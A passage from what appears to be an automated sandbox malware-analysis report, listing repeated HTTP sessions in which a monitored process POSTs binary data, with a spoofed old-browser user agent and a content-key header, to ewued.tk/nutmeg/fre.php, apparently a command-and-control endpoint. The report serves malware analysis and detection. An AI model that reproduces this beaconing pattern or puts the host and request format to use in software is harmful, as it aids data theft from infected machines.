Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #16

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #17

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #18

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #19

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #20

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #21

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #22

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

HTTP Session #23

Information	Value
User Agent	Mozilla/4.08 (Charon; Inferno)
Server Name	ewued.tk
Server Port	80
Data Sent	235
Data Received	0

Operation	Additional Information	Count	Logfile
Open Session	user_agent = Mozilla/4.08 (Charon; Inferno), access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = ewued.tk, server_port = 80	1	Fn
Open HTTP Request	http_verb = POST, http_version = HTTP/1.0, target_resource = /nutmeg/fre.php	1	Fn
Send HTTP Request	headers = content-length: 163, content-key: D8E3CC32, content-encoding: binary, connection: close, accept: /, user-agent: Mozilla/4.08 (Charon; Inferno), host: ewued.tk, content-type: application/octet-stream, url = ewued.tk/nutmeg/fre.php	1	Fn Data

Notifications (1/1)

Monitored Processes

Behavior Information - Grouped by Category

Before

After